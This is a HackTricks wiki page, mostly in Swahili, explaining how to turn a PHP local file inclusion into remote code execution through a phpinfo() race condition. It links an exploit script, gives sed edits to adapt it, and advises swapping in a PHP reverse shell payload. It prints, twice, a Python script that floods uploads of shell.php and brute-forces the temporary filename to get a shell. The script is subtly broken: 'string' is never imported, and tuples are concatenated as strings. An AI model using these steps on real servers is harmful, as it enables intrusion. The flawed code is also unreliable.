LFI2RCE via phpinfo()

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Pata mtazamo wa hacker kuhusu programu zako za wavuti, mtandao, na wingu

Pata na ripoti udhaifu muhimu, unaoweza kutumiwa kwa faida halisi ya biashara. Tumia zana zetu zaidi ya 20 za kawaida kupanga uso wa shambulio, pata masuala ya usalama yanayokuruhusu kupandisha mamlaka, na tumia mashambulizi ya kiotomatiki kukusanya ushahidi muhimu, ukigeuza kazi yako ngumu kuwa ripoti za kushawishi.

Penetration testing toolkit, ready to usePentest-Tools.com

Ili kutumia udhaifu huu unahitaji: Udhaifu wa LFI, ukurasa ambapo phpinfo() inaonyeshwa, "file_uploads = on" na seva inapaswa kuwa na uwezo wa kuandika kwenye saraka ya "/tmp".

https://www.insomniasec.com/downloads/publications/phpinfolfi.py

Tutorial HTB: https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s

Unahitaji kurekebisha exploit (badilisha => kwa =>). Ili kufanya hivyo unaweza kufanya:

sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g' phpinfolfi.py

You have to change also the payload at the beginning of the exploit (for a php-rev-shell for example), the REQ1 (this should point to the phpinfo page and should have the padding included, i.e.: REQ1="""POST /install.php?mode=phpinfo&a="""+padding+""" HTTP/1.1), and LFIREQ (this should point to the LFI vulnerability, i.e.: LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r -- Check the double "%" when exploiting null char)

Theory

Ikiwa upakuaji unaruhusiwa katika PHP na unajaribu kupakia faili, faili hizi huhifadhiwa katika directory ya muda hadi seva ikamilishe usindikaji wa ombi, kisha faili hizi za muda zifutwa.

Kisha, ikiwa umepata udhaifu wa LFI katika seva ya wavuti unaweza kujaribu kukisia jina la faili ya muda iliyoundwa na kutumia RCE kwa kufikia faili ya muda kabla haijafutwa.

Katika Windows faili kawaida huhifadhiwa katika C:\Windows\temp\php

Katika linux jina la faili lilikuwa random na liliko katika /tmp. Kwa kuwa jina ni random, inahitajika kuchukua kutoka mahali fulani jina la faili ya muda na kuifikia kabla haijafutwa. Hii inaweza kufanywa kwa kusoma thamani ya variable $_FILES ndani ya maudhui ya kazi "phpconfig()".

phpinfo()

PHP inatumia buffer ya 4096B na wakati inakuwa kamili, inatumwa kwa mteja. Kisha mteja anaweza kutuma ombii mengi makubwa (akitumia vichwa vikubwa) akipakia php reverse shell, kusubiri kwa sehemu ya kwanza ya phpinfo() irudishwe (ambapo jina la faili ya muda liko) na kujaribu kufikia faili ya muda kabla seva ya php haijafuta faili hiyo kwa kutumia udhaifu wa LFI.

Python script to try to bruteforce the name (if length = 6)

import itertools
import requests
import sys

print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)


print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text:  # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)

print('[x] Something went wrong, please try again')

Pata mtazamo wa hacker kuhusu programu zako za wavuti, mtandao, na wingu

Pata na ripoti kuhusu udhaifu muhimu, unaoweza kutumiwa kwa faida. Tumia zana zetu 20+ za kawaida kupanga uso wa shambulio, pata masuala ya usalama yanayokuruhusu kupandisha mamlaka, na tumia mashambulizi ya kiotomatiki kukusanya ushahidi muhimu, ukigeuza kazi yako ngumu kuwa ripoti za kushawishi.

Penetration testing toolkit, ready to usePentest-Tools.com

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousLFI2RCE via Segmentation Fault NextLFI2RCE Via temp file uploads

Last updated 6 days ago

import itertools import requests import sys print('[+] Trying to win the race') f = {'file': open('shell.php', 'rb')} for _ in range(4096 * 4096): requests.post('http://target.com/index.php?c=index.php', f) print('[+] Bruteforcing the inclusion') for fname in itertools.combinations(string.ascii_letters + string.digits, 6): url = 'http://target.com/index.php?c=/tmp/php' + fname r = requests.get(url) if 'load average' in r.text: # <?php echo system('uptime'); print('[+] We have got a shell: ' + url) sys.exit(0) print('[x] Something went wrong, please try again')